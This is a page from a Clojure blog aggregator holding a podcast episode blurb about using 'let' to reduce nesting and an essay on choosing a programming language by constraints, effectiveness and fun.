Each week, we discuss a different topic about Clojure and functional programming.

If you have a question or topic you’d like us to discuss, tweet @clojuredesign, send an email to feedback@clojuredesign.club, or join the #clojuredesign-podcast channel on the Clojurians Slack.

This week, the topic is: “let.” Let us share some tricks to reduce nesting and make your code easier to understand.

Selected quotes:

  • “It’s really about avoiding nesting.”
  • “Functions grow as a function of their nesting.”
  • “I don’t want to start doing math on a nil!”
  • “It’s a clue that the value might not be there.”
  • “It’s like your prep space in the kitchen.”

Links:

Permalink

How to Pick a Language

Say you&aposre about to build a new project. You&aposre an expert in a few languages, and you have a sense of the ecosystem in general. How do you choose the language you build with? I wanted to share my decision framework with you.

Start with Constraints

Some requirements can eliminate entire categories of choices. Let’s use that to our advantage: start by narrowing down your choices. For example:

Do you need extreme efficiency? This would mean your code may need to be compiled and that you can’t have run-time garbage collection. Well, that narrows down your choices quite a bit.

Do you need math-level proofs that your code works as expected? This would mean you need an extremely strong type system. Bam, narrows choices down quite a bit

Do you need concurrency? There are only a few VMs and a few languages that are known to be excellent for concurrency. Depending on what you need, this will narrow your choices down to a few families.

Do you work in a larger environment? If you are building something, and your entire company is on one stack, there’s so much power to the existing ecosystem that this effectively narrows down your choice to the language of your environment.1

Is your problem in a domain where the ecosystem in one language is strongest? If you’re in machine learning, the ecosystem in python is so powerful that it almost guarantees to narrow down your choice to that language.

Is your problem a small script that needs to run everywhere? This narrows your choices down to the languages that are available by default on Linux

Now, there’s a leverage point here: constraints narrow down your choices in a significant way. If you add a constraint you didn’t need, you risk sacrificing a large set of options. For example, many think their system needs to scale from the get-go. This is rarely the case and kills some of the choices that contributed to the success of the biggest companies today 2

So pick your constraints carefully. Once you do though, you’ll be pleasantly surprised with how much clarity they give you: your choices will have gone through a significant filter.

Optimize for Effectiveness

The next filter is effectiveness. Choose the language that maximizes your output on a time scale you care about.

At this stage, there is often a tradeoff between what you’re comfortable with and what you need to discover. Say you’re comfortable in assembly, but don’t know any other languages. What should you do?

Well, for some very small problems, it does make sense to just write them in assembly. If they’re urgent, you have no other choice. But for any significant work, you’ll outstrip the productivity of assembly within a few days of ramp-up.

The same kind of spectrum exists in higher-level languages, but the differences take longer to show up. If you’re comfortable with Java, for example, you can get a lot done pretty quickly. But within some period, the productivity benefits pale in comparison to more powerful languages.

Making this choice is a bit of an art, but it works like this. You want to think about a time-frame that you’d like to optimize and pick the language that optimizes for effectiveness within that timeframe.

If you’re in a hurry, you have no choice but to use what you’re comfortable with, no matter how limiting. There are two ways to avoid the dilemma. You can either play with different languages before you start your project, so you have a wider array of comfortable choices to pick from, or give yourself a few months to ramp up and select the language that’s most effective for your problem.

With that, the question comes, what time frame should you optimize for? This is in itself an art. For startups, I would say about 8-12 months. Planning further than that is over-optimization. For larger companies, I’d think 2-5 years.

Break Ties with Fun

Now you’ve gone through two filters. Say you narrowed down to just a few choices, but you aren’t sure which one to take. How should you break the tie?

I’d say fun. There are so many schleps in a startup that programming should be as fun as possible. Once. I narrowed down. I’d choose the language I’m most excited about.


Thanks to Sean Grove, Daniel Woelfel, Joe Averbukh, Alex Reichert for reviewing drafts of this essay

1

Greg Brockman made great points in his talk on Stripe culture. Choosing to work in the same language as the rest of the company magnifies the impact of each engineer.

2

Most successful large companies that were founded in the ~2010 range used either Ruby or Python. Both would strike off the list if you optimized for scale prematurely. Not to be said that you should use them though. They were popular because of how expressive and powerful they were. Some languages are just as expressive, if not more (think Elixir, Clojure), that happen to also be concurrent.

Permalink

Copyright © 2009, Planet Clojure. No rights reserved.
Planet Clojure is maintained by Baishamapayan Ghose.
Clojure and the Clojure logo are Copyright © 2008-2009, Rich Hickey.
Theme by Brajeshwar.